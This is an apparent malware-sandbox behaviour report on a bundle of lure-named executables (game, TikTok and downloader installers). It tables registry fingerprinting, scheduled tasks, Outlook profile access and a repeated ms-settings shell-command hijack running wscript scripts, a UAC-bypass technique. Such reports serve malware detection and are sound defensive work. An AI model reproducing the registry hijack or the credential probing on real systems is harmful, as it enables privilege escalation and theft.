| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Berry Player 3.3.7\berryplayer32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\tik-tok-1.0.5.0-installer_iPXA-F1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\unik.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\TikTok18.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\GTA_V.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\getlab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-21IMK.tmp\getlab.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Desktop\New Text Document mod.exse\a\TPB-1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\is-L1Q0J.tmp\GTA_V.tmp | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New Text Document mod.exse\a\TPB-1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\is-L1Q0J.tmp\GTA_V.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\Microsoft.VC80.MFC,type="win32",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86" = 67006700610044004c004d004e002c00540040003f004400350062002e0057004b0075003d005d00560043005f005200650064006900730074003e0021004d00210026005a005a006300300025006e00650038004d006b0062004900640046007700550000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\policy.8.0.Microsoft.VC80.OpenMP,type="win32-policy",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86" = 67006700610044004c004d004e002c00540040003f004400350062002e0057004b0075003d005d00560043005f005200650064006900730074003e00370030002d0054002400210028002a0026004e00650038004d006b0062004900640046007700550000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\1 = ";Microsoft Visual C++ 2005 Redistributable [Disk 1]" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\AA5D9C68C00F12943B2F6CA09FE28244\c1c4f01781cc94c4c8fb1542c0981a2a | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\Microsoft.VC80.OpenMP,type="win32",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86" = 67006700610044004c004d004e002c00540040003f004400350062002e0057004b0075003d005d00560043005f005200650064006900730074003e0035006f00300068002c0070004d0076004e003d00650038004d006b0062004900640046007700550000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Desktop\4363463463464363463463463\Files\System.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\1960.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\Language = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\3 = ";Microsoft Visual C++ 2005 Redistributable [Disk 1]" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Desktop\4363463463464363463463463\Files\pornhub_downloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\5536.vbs" | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\policy.8.0.Microsoft.VC80.ATL,type="win32-policy",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86" = 67006700610044004c004d004e002c00540040003f004400350062002e0057004b0075003d005d00560043005f005200650064006900730074003e0036006b007d00700048004c004800240053004400650038004d006b0062004900640046007700550000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\c1c4f01781cc94c4c8fb1542c0981a2a | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\11 = ";Microsoft Visual C++ 2005 Redistributable [Disk 1]" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\ProductName = "Microsoft Visual C++ 2005 Redistributable" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\AA5D9C68C00F12943B2F6CA09FE28244 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\PackageName = "vcredist.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\7 = ";Microsoft Visual C++ 2005 Redistributable [Disk 1]" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open\command | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\policy.8.0.Microsoft.VC80.MFCLOC,type="win32-policy",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86" = 67006700610044004c004d004e002c00540040003f004400350062002e0057004b0075003d005d00560043005f005200650064006900730074003e006600720038005f006c0028006d0032004e004400650038004d006b0062004900640046007700550000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\DiskPrompt = "[1]" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\9 = ";Microsoft Visual C++ 2005 Redistributable [Disk 1]" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\2 = ";Microsoft Visual C++ 2005 Redistributable [Disk 1]" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\6 = ";Microsoft Visual C++ 2005 Redistributable [Disk 1]" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\8 = ";Microsoft Visual C++ 2005 Redistributable [Disk 1]" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\5024.vbs" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\policy.8.0.Microsoft.VC80.MFC,type="win32-policy",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86" = 67006700610044004c004d004e002c00540040003f004400350062002e0057004b0075003d005d00560043005f005200650064006900730074003e003d0024006b00600049004e005d00490038004300650038004d006b0062004900640046007700550000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\c1c4f01781cc94c4c8fb1542c0981a2a\VC_Redist | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Media\4 = ";Microsoft Visual C++ 2005 Redistributable [Disk 1]" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Win32Assemblies\Global\Microsoft.VC80.ATL,type="win32",version="8.0.50727.6195",publicKeyToken="1fc8b3b9a1e18e3b",processorArchitecture="x86" = 67006700610044004c004d004e002c00540040003f004400350062002e0057004b0075003d005d00560043005f005200650064006900730074003e00700052005e007000580049006000510075006f00650038004d006b0062004900640046007700550000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\c1c4f01781cc94c4c8fb1542c0981a2a\Servicing_Key | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\Version = "134278729" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell\Open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\PackageCode = "84067013B7B56744BA0F51892982BC09" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\c1c4f01781cc94c4c8fb1542c0981a2a\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\ms-settings\Shell | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Desktop\New Text Document mod.exse\a\gvndxfghs.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Downloaders.zip"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffffd8ccc40,0x7ffffd8ccc4c,0x7ffffd8ccc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2032,i,10628847526670481716,11833010858721163792,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1960 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1848,i,10628847526670481716,11833010858721163792,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,10628847526670481716,11833010858721163792,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2320 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,10628847526670481716,11833010858721163792,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,10628847526670481716,11833010858721163792,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3700,i,10628847526670481716,11833010858721163792,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4552 /prefetch:1
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2008 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1928 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {89f0bc6e-3c92-45f1-be38-ad7c919be9bc} 852 "\\.\pipe\gecko-crash-server-pipe.852" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
